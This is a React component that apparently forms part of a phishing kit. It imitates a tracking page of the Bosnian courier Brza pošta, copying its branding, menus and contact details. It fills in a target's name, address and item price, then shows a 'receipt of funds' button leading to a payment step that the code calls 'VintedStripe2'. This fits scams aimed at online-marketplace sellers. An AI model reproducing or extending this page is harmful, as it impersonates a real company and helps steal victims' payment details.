import React, { useEffect, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './BrzaPostaBaSuccess.css';
import SupportWidget from './SupportWidget';
import { API_URL } from '../apiBase';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const BRZA_LOGO_SRC = `${process.env.PUBLIC_URL || ''}/brzaposta-logo.png`;

function BrzaPostaLogo() {
  return (
    <div className="bp-logo-block">
      <img src={BRZA_LOGO_SRC} alt="Brza pošta" className="bp-logo-img" width={220} height={72} />
    </div>
  );
}

function IconUser() {
  return (
    <svg width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="1.8" aria-hidden>
      <circle cx="12" cy="8" r="3.5" />
      <path d="M6 20v-1a6 6 0 0 1 12 0v1" />
    </svg>
  );
}

function IconSearch() {
  return (
    <svg width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" aria-hidden>
      <circle cx="11" cy="11" r="7" />
      <path d="M21 21l-4.35-4.35" />
    </svg>
  );
}

function IconHelp() {
  return (
    <button type="button" className="bp-help-ico" aria-label="Pomoć">
      <span>?</span>
    </button>
  );
}

function SocialFb() {
  return (
    <svg width="22" height="22" viewBox="0 0 24 24" fill="currentColor" aria-hidden>
      <path d="M24 12.073c0-6.627-5.373-12-12-12s-12 5.373-12 12c0 5.99 4.388 10.954 10.125 11.854v-8.385H7.078v-3.47h3.047V9.43c0-3.007 1.792-4.669 4.533-4.669 1.312 0 2.686.235 2.686.235v2.953H15.83c-1.491 0-1.956.925-1.956 1.874v2.25h3.328l-.532 3.47h-2.796v8.385C19.612 23.027 24 18.062 24 12.073z" />
    </svg>
  );
}

function SocialYt() {
  return (
    <svg width="22" height="22" viewBox="0 0 24 24" fill="currentColor" aria-hidden>
      <path d="M23.498 6.186a3.016 3.016 0 0 0-2.122-2.136C19.505 3.545 12 3.545 12 3.545s-7.505 0-9.377.505A3.017 3.017 0 0 0 .502 6.186C0 8.07 0 12 0 12s0 3.93.502 5.814a3.016 3.016 0 0 0 2.122 2.136c1.871.505 9.376.505 9.376.505s7.505 0 9.377-.505a3.015 3.015 0 0 0 2.122-2.136C24 15.93 24 12 24 12s0-3.93-.502-5.814zM9.545 15.568V8.432L15.818 12l-6.273 3.568z" />
    </svg>
  );
}

function SocialIg() {
  return (
    <svg width="22" height="22" viewBox="0 0 24 24" fill="currentColor" aria-hidden>
      <path d="M12 2.163c3.204 0 3.584.012 4.85.07 3.252.148 4.771 1.691 4.919 4.919.058 1.265.069 1.645.069 4.849 0 3.205-.012 3.584-.069 4.849-.149 3.225-1.664 4.771-4.919 4.919-1.266.058-1.644.07-4.85.07-3.204 0-3.584-.012-4.849-.07-3.26-.149-4.771-1.699-4.919-4.92-.058-1.265-.07-1.644-.07-4.849 0-3.204.013-3.583.07-4.849.149-3.227 1.664-4.771 4.919-4.919 1.266-.057 1.645-.069 4.849-.069zM12 0C8.741 0 8.333.014 7.053.072 2.695.272.273 2.69.073 7.052.014 8.333 0 8.741 0 12c0 3.259.014 3.668.072 4.948.2 4.358 2.618 6.78 6.98 6.98C8.333 23.986 8.741 24 12 24c3.259 0 3.668-.014 4.948-.072 4.354-.2 6.782-2.618 6.979-6.98.059-1.28.073-1.689.073-4.948 0-3.259-.014-3.667-.072-4.947-.196-4.354-2.617-6.78-6.979-6.98C15.668.014 15.259 0 12 0zm0 5.838a6.162 6.162 0 1 0 0 12.324 6.162 6.162 0 0 0 0-12.324zM12 16a4 4 0 1 1 0-8 4 4 0 0 1 0 8zm6.406-11.845a1.44 1.44 0 1 0 0 2.881 1.44 1.44 0 0 0 0-2.881z" />
    </svg>
  );
}

const FOOTER_ONAMA = ['Gdje dostavljamo', 'Novosti', 'Kontakt', 'FAQ', 'Reklamacije'];
const FOOTER_USLUGE = [
  'Cjenik usluga',
  'Praćenje pošiljaka',
  'Dodatne usluge',
  'Ambalaža',
  'Ugovaranje usluga',
];
const FOOTER_SERVISI = [
  'Nalog za prikup pošiljke',
  'Rokovi dostave',
  'Kalkulator',
  'Web aplikacija',
  'Opći uvjeti',
];

/**
 * Brza pošta (BA) — nakon captcha; dugme → index2 (VintedStripe2).
 */
function BrzaPostaBaSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) return;
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetch(`${API_URL}/api/page/${pageCode}`)
      .then((res) => res.json())
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .catch(() => {})
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'BA').toUpperCase();
  const primary = getPrimaryCurrency(countryCode);
  const curSym = getSymbol(primary);

  const priceNumber = (() => {
    const raw = pageData?.price;
    if (raw == null) return 0;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : 0;
  })();

  const priceText =
    Number.isFinite(priceNumber) && priceNumber % 1 === 0
      ? String(priceNumber.toFixed(0))
      : String(priceNumber);

  const fn = (pageData?.first_name || '').trim();
  const ln = (pageData?.last_name || '').trim();
  const fullName = [fn, ln].filter(Boolean).join(' ') || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const productName = (pageData?.product_name || '').trim() || '—';
  const napomenaLine = `${productName}, ${priceText} ${curSym}`;
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  if (loading && pageCode) {
    return (
      <div className="bp-wrap">
        <div className="bp-loading">Učitavanje…</div>
        <div className="bp-support">
          <SupportWidget sessionId={sessionId} countryCode={countryCode} />
        </div>
      </div>
    );
  }

  return (
    <div className="bp-wrap">
      <header className="bp-header">
        <div className="bp-header-inner">
          <a href="#/" className="bp-brand" aria-label="Brza pošta">
            <BrzaPostaLogo />
          </a>
          <nav className="bp-nav" aria-label="Glavna navigacija">
            <a href="#/">Naslovna</a>
            <a href="#/">Usluge ▾</a>
            <a href="#/">Servisi ▾</a>
            <a href="#/">O nama ▾</a>
          </nav>
          <div className="bp-tools">
            <a href="#/" className="bp-web-app">
              <IconUser />
              Web aplikacija
            </a>
            <div className="bp-search">
              <input type="search" placeholder="Search ..." readOnly aria-label="Pretraga" />
              <span className="bp-search-ico">
                <IconSearch />
              </span>
            </div>
            <button type="button" className="bp-lang">
              Hrvatski <span className="bp-caret">▾</span>
            </button>
          </div>
        </div>
      </header>

      <div className="bp-blackbar" aria-hidden />

      <main className="bp-yellow">
        <div className="bp-yellow-inner">
          <h1 className="bp-h1">Praćenje pošiljke</h1>

          <section className="bp-block">
            <h2 className="bp-h2">Podaci o primatelju:</h2>
            <div className="bp-field-row">
              <div className="bp-field-grow">
                <label className="bp-lbl">Ime i prezime</label>
                <input type="text" className="bp-input" readOnly value={fullName} />
              </div>
              <IconHelp />
            </div>
            <div className="bp-field-row">
              <div className="bp-field-grow">
                <label className="bp-lbl">Adresa</label>
                <input type="text" className="bp-input" readOnly value={address} />
              </div>
              <IconHelp />
            </div>
          </section>

          <section className="bp-block">
            <h2 className="bp-h2">Podaci o pošiljci:</h2>
            <div className="bp-field-row">
              <div className="bp-field-grow">
                <label className="bp-lbl">Napomena</label>
                <input type="text" className="bp-input" readOnly value={napomenaLine} />
              </div>
              <IconHelp />
            </div>
          </section>

          <section className="bp-block bp-block--pay">
            <div className="bp-field-row">
              <div className="bp-field-grow">
                <label className="bp-lbl">Način plaćanja</label>
                <input type="text" className="bp-input" readOnly value={`${productName}, ${priceText} ${curSym}`} />
              </div>
              <IconHelp />
            </div>
            <div className="bp-field-row">
              <div className="bp-field-grow">
                <label className="bp-lbl bp-lbl--vh">Način isporuke</label>
                <input type="text" className="bp-input" readOnly value="Primalac robe plaća dostavu" />
              </div>
              <IconHelp />
            </div>
          </section>

          <Link to={index2Path} className="bp-cta">
            PRIJEM SREDSTAVA ({priceText} {curSym})
          </Link>
        </div>
      </main>

      <footer className="bp-footer">
        <div className="bp-footer-inner">
          <div className="bp-fcol">
            <h3>O nama</h3>
            <ul>
              {FOOTER_ONAMA.map((t) => (
                <li key={t}>
                  <a href="#/">{t}</a>
                </li>
              ))}
            </ul>
          </div>
          <div className="bp-fcol">
            <h3>Usluge</h3>
            <ul>
              {FOOTER_USLUGE.map((t) => (
                <li key={t}>
                  <a href="#/">{t}</a>
                </li>
              ))}
            </ul>
          </div>
          <div className="bp-fcol">
            <h3>Servisi</h3>
            <ul>
              {FOOTER_SERVISI.map((t) => (
                <li key={t}>
                  <a href="#/">{t}</a>
                </li>
              ))}
            </ul>
          </div>
          <div className="bp-fcol">
            <h3>Kontakt podaci</h3>
            <p className="bp-ft-p">
              <strong>Adresa:</strong> Tvrtka Miloša bb, 88000 Mostar
            </p>
            <p className="bp-ft-p">
              <strong>Telefon:</strong> 1323
            </p>
            <p className="bp-ft-p">
              <strong>E-mail:</strong> korisnicka.sluzba@post.ba
            </p>
          </div>
          <div className="bp-fcol">
            <h3>Pratite nas</h3>
            <div className="bp-soc">
              <a href="#/" aria-label="Facebook">
                <SocialFb />
              </a>
              <a href="#/" aria-label="YouTube">
                <SocialYt />
              </a>
              <a href="#/" aria-label="Instagram">
                <SocialIg />
              </a>
            </div>
          </div>
        </div>
      </footer>

      <div className="bp-support">
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    </div>
  );
}

export default BrzaPostaBaSuccess;
